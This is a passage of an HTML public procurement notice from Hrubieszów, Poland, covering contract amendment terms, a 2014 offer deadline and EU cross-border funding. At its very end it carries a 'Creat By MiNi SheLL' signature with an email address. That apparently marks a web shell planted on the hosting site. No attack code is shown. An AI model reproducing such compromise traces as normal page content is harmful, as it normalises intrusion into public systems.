6.	gdy konieczność zmiany jest spowodowana wystąpieniem niezależnych od stron okoliczności, których nie można było przy dołożeniu należytej staranności przewidzieć          w chwili zawarcia umowy, a które uniemożliwiają prawidłową realizację przedmiotu umowy zgodnie z jej postanowieniami, Dopuszcza się wszelkie zmiany nieistotne rozumiane w ten sposób, że wiedza o ich wprowadzeniu na etapie postępowania o zamówienie nie wpłynęłaby na krąg podmiotów ubiegających się o zamówienie ani na wynik postępowania o udzielenie zamówienia publicznego,
7.	Zmiany treści Umowy związanej ze zmianą podatku VAT
8.	Z Wykonawcą, którego oferta zostanie uznana przez Zamawiającego za ofertę najkorzystniejszą, zostanie podpisana umowa. Projekt umowy stanowi Załącznik nr 10          do SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.umhrubieszow.bip.lubelskie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta w Hrubieszowie -Wspólne Biuro Zarządzania Zaopatrzenia w wodę ul. 3-go Maja 15 tel. 84 6964262..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.04.2014 godzina 13:00, miejsce: Gmina Miejska Hrubieszów ul. Mjr H. Dobrzańskiego Hubala 1, 22-500 Hrubieszów..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Dofinansowanie zadania pochodzi ze środków Europejskiego Instrumentu Sąsiedztwa i Partnerstwa                     w ramach Programu Współpracy Transgranicznej Polska - Białoruś - Ukraina 2007-2013.
Priorytet 1. Wzrost konkurencyjności obszaru przygranicznego.
Działanie 1. 3. Poprawa dostępności regionu..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com